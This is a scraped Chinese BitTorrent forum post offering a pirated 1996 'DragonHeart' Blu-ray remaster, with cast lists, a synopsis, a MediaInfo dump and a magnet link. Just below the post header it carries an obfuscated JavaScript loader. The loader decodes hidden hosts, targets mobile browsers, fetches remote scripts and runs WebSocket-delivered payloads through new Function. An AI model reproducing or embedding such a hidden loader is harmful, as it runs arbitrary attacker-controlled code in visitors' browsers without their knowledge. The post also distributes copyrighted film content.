龙之心[简繁字幕].DragonHeart.1996.Remastered.BluRay.1080p.TrueHD.Atmos.7.1.x265.10bit 14.35GB

版主小s 10天前 107

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 龙之心 / 龙心国王 / 魔幻屠龙 / 魔龙传奇 / 屠龙记

◎片 名 DragonHeart

◎年 代 1996

◎产 地 美国

◎类 别 剧情 / 动作 / 奇幻 / 冒险

◎语 言 英语

◎上映日期 1996-05-31(美国)

◎IMDb链接 https://www.imdb.com/title/tt0116136/

◎豆瓣评分 6.9/10 (2796人评价)

◎豆瓣链接 https://movie.douban.com/subject/1293417/

◎片 长 103分钟

◎导 演 罗伯·科恩 Rob Cohen (id:1032129)

◎编 剧 查尔斯·爱德华·波格 Charles Edward Pogue (id:1326698)

帕特里克·里德·约翰逊 Patrick Read Johnson (id:1045436)

◎演 员 丹尼斯·奎德 Dennis Quaid (id:1002679)

大卫·休里斯 David Thewlis (id:1031862)

皮特·波斯尔思韦特 Pete Postlethwaite (id:1007023)

迪娜·迈耶 Dina Meyer (id:1036357)

詹森·艾萨克 Jason Isaacs (id:1017916)

布莱恩·汤普森 Brian Thompson (id:1049671)

李·奥克斯 Lee Oakes (id:1326699)

朱莉·克里斯蒂 Julie Christie (id:1000086)

约翰·吉尔古德 John Gielgud (id:1000249)

大卫·艾格比 David Eggby (id:1283033)

玛格莉·辛姆金 Margery Simkin (id:1297613)

约瑟夫·穆索 Joseph Musso (id:1445379)

本哈明·费勒南戴斯 Benjamín Fernández (id:1283598)

玛丽亚-特雷莎·巴巴索 Maria-Teresa Barbasso (id:1277870)

Thomas Casterline Thomas Casterline (id:1280272)

安娜·B·薛帕德 Anna B. Sheppard (id:1278606)

莫里齐奥·西尔维 Maurizio Silvi (id:1297604)

Chitra F. Mojtabai Chitra F. Mojtabai (id:1276246)

Danny Gordon Taylor Danny Gordon Taylor (id:1298977)

John Walker John Walker (id:1300301)

菲尔 蒂贝特 Phil Tippett (id:1299349)

斯科特·斯奎尔斯 Scott Squires (id:1298205)

詹姆斯·斯特劳斯 James Straus (id:1298547)

罗伯特·斯特罗姆伯格 Robert Stromberg (id:1298560)

Bill Taylor Bill Taylor (id:1298968)

乔纳森·罗斯巴特 Jonathan Rothbart (id:1296181)

Steve Nichols Steve Nichols (id:1293144)

Marshall Richard Krasser Marshall Richard Krasser (id:1288991)

丹尼尔·简尼特 Daniel Jeannette (id:1287643)

克雷格·海斯 Craig Hayes (id:1286277)

Mike Wassel Mike Wassel (id:1300479)

Judith Weaver Judith Weaver (id:1300544)

拉塞尔·厄尔 Russell Earl (id:1282937)

罗杰·盖耶特 Roger Guyett (id:1276493)

Chad Taylor Chad Taylor (id:1298971)

◎标 签 魔幻 / 奇幻 / 美国 / 美国电影 / 1996 / 肖恩·康纳利 / 动作 / 龙

◎简 介

一次意外中,王子爱侬(大卫·休里斯 David Thewlis 饰)的心脏受到了致命伤害,为了挽救王子的性命,一条龙献出了自己的半颗心脏。起死回生后的爱侬性情大变,凶恶又残暴,身为王子的剑术老师,伯温(丹尼斯·奎德 Dennis Quaid 饰)认为造成这一改变的罪魁祸首是王子的那一半龙心,为了帮助王子找回心性,爱侬决定不惜一切代价,找到拥有另一半心脏的龙。

一转眼十年过去,死在伯温手下的龙不计其数,最终,他遇见了一直在寻找的宿敌,一人一龙之间却产生了深厚的友谊。渐渐的,伯温发现,爱侬的残暴和龙心无关,系他的本性,得知了这一真相的伯温同旅途中认识的卡拉(戴安· 梅尔 Dina Meyer 饰)一起,加入到了推翻爱侬暴政的起义当中去。

◎获奖情况 (共1项)

第69届奥斯卡金像奖 (1997)

最佳视觉效果(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 161477007170172137983321720232926433832 (0x797B5720C73CA18D56B189C8C93ED228)

  4. Complete name : DragonHeart[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 14.3 GiB

  8. Duration : 1 h 44 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 19.7 Mb/s

  11. Encoded date : UTC 2021-10-11 03:11:25

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 42 min

  21. Bit rate : 14.9 Mb/s

  22. Width : 1 920 pixels

  23. Height : 814 pixels

  24. Display aspect ratio : 2.35:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.398

  31. Stream size : 10.7 GiB (75%)

  32. Title : HEVC, [email protected]@High, 24/1.001 fps @ 14901 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=3 / numa-pools=8 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x814 / interlace=0 / total-frames=147956 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=19.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio #1

  43. ID : 2

  44. Format : MLP FBA 16-ch

  45. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  46. Commercial name : Dolby TrueHD with Dolby Atmos

  47. Codec ID : A_TRUEHD

  48. Duration : 1 h 44 min

  49. Bit rate mode : Variable

  50. Bit rate : 3 949 kb/s

  51. Maximum bit rate : 5 619 kb/s

  52. Channel(s) : 8 channels

  53. Channel layout : L R C LFE Ls Rs Lb Rb

  54. Sampling rate : 48.0 kHz

  55. Frame rate : 1 200.000 FPS (40 SPF)

  56. Compression mode : Lossless

  57. Delay relative to video : 1 s 1 ms

  58. Stream size : 2.87 GiB (20%)

  59. Title : English Dolby TrueHD 7.1 (Atmos) @ 4011 kbps

  60. Language : English

  61. Default : Yes

  62. Forced : No

  63. Number of dynamic objects : 13

  64. Bed channel count : 1 channel

  65. Bed channel configuration : LFE


  66. Audio #2

  67. ID : 3

  68. Format : AC-3

  69. Format/Info : Audio Coding 3

  70. Commercial name : Dolby Digital

  71. Codec ID : A_AC3

  72. Duration : 1 h 44 min

  73. Bit rate mode : Constant

  74. Bit rate : 640 kb/s

  75. Channel(s) : 6 channels

  76. Channel layout : L R C LFE Ls Rs

  77. Sampling rate : 48.0 kHz

  78. Frame rate : 31.250 FPS (1536 SPF)

  79. Compression mode : Lossy

  80. Delay relative to video : 1 s 1 ms

  81. Stream size : 477 MiB (3%)

  82. Title : English Dolby 5.1-EX 5.1 @ 640 kbps

  83. Language : English

  84. Service kind : Complete Main

  85. Default : No

  86. Forced : No


  87. Audio #3

  88. ID : 4

  89. Format : AC-3

  90. Format/Info : Audio Coding 3

  91. Commercial name : Dolby Digital

  92. Codec ID : A_AC3

  93. Duration : 1 h 42 min

  94. Bit rate mode : Constant

  95. Bit rate : 192 kb/s

  96. Channel(s) : 2 channels

  97. Channel layout : L R

  98. Sampling rate : 48.0 kHz

  99. Frame rate : 31.250 FPS (1536 SPF)

  100. Compression mode : Lossy

  101. Stream size : 141 MiB (1%)

  102. Title : English Dolby Digital Audio 2.0 @ 192 kbps Commentary

  103. Language : English

  104. Service kind : Complete Main

  105. Default : No

  106. Forced : No


  107. Text #1

  108. ID : 5

  109. Format : PGS

  110. Codec ID : S_HDMV/PGS

  111. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  112. Duration : 1 h 35 min

  113. Bit rate : 26.0 kb/s

  114. Count of elements : 1802

  115. Stream size : 17.8 MiB (0%)

  116. Title : Eng/SUP

  117. Language : English

  118. Default : No

  119. Forced : No


  120. Text #2

  121. ID : 6

  122. Format : PGS

  123. Codec ID : S_HDMV/PGS

  124. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  125. Duration : 1 h 35 min

  126. Bit rate : 28.7 kb/s

  127. Count of elements : 2012

  128. Stream size : 19.7 MiB (0%)

  129. Title : Eng/SUP SDH

  130. Language : English

  131. Default : No

  132. Forced : No


  133. Text #3

  134. ID : 7

  135. Format : PGS

  136. Codec ID : S_HDMV/PGS

  137. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  138. Duration : 1 h 36 min

  139. Bit rate : 61.8 kb/s

  140. Count of elements : 2477

  141. Stream size : 42.8 MiB (0%)

  142. Title : Eng/SUP Commentary

  143. Language : English

  144. Default : No

  145. Forced : No


  146. Text #4

  147. ID : 8

  148. Format : PGS

  149. Codec ID : S_HDMV/PGS

  150. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  151. Duration : 1 h 36 min

  152. Bit rate : 25.4 kb/s

  153. Count of elements : 1744

  154. Stream size : 17.5 MiB (0%)

  155. Title : Chs/SUP 简英双语

  156. Language : Chinese

  157. Default : Yes

  158. Forced : No


  159. Text #5

  160. ID : 9

  161. Format : PGS

  162. Codec ID : S_HDMV/PGS

  163. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  164. Duration : 1 h 36 min

  165. Bit rate : 25.9 kb/s

  166. Count of elements : 1744

  167. Stream size : 17.9 MiB (0%)

  168. Title : Cht/SUP 繁英双语

  169. Language : Chinese

  170. Default : No

  171. Forced : No


  172. Menu

  173. 00:00:00.000 : en:第 01 章

  174. 00:04:01.324 : en:第 02 章

  175. 00:09:20.810 : en:第 03 章

  176. 00:15:07.532 : en:第 04 章

  177. 00:17:26.837 : en:第 05 章

  178. 00:22:06.909 : en:第 06 章

  179. 00:24:55.619 : en:第 07 章

  180. 00:28:16.945 : en:第 08 章

  181. 00:32:33.285 : en:第 09 章

  182. 00:35:47.187 : en:第 10 章

  183. 00:40:20.752 : en:第 11 章

  184. 00:45:38.402 : en:第 12 章

  185. 00:48:54.598 : en:第 13 章

  186. 00:54:50.078 : en:第 14 章

  187. 00:58:23.125 : en:第 15 章

  188. 01:04:52.931 : en:第 16 章

  189. 01:10:05.326 : en:第 17 章

  190. 01:15:01.997 : en:第 18 章

  191. 01:20:43.756 : en:第 19 章

  192. 01:25:45.432 : en:第 20 章

  193. 01:30:43.355 : en:第 21 章

  194. 01:36:53.933 : en:第 22 章




复制代码


TAGS 动作 奇幻 冒险 剧情

磁力链:
  • magnet:?xt=urn:btih:BE86B288D93D625C230967C96CCADDDDE3308F9D
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回